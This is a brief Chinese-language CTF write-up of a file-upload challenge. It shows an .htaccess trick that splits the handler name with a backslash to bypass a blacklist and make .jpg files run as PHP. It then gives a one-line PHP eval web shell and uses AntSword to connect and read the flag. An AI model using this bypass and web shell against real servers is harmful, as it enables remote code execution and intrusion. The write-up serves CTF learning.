打開題目鏈接,就是一個上傳界面,fuzz後發現過濾了一些字符,但是可以上傳jpg類型的文件
參考wp發現數據庫是使用的apche,並且開啓了htaccess配置文件
.htaccess文件(或者"分佈式配置文件")提供了針對每個目錄改變配置的方法,即在一個特定的目錄中放置一個包含指令的文件,其中的指令作用於此目錄及其所有子目錄
我們先上傳.htaccess,將jpg轉成php執行(使用反斜槓繞過黑名單|類型注意要改爲圖片類型)
AddType application/x-httpd-p\
hp .jpg
上傳繞過
<?=eval($_POST['cmd']);
使用蟻劍連接,查看flag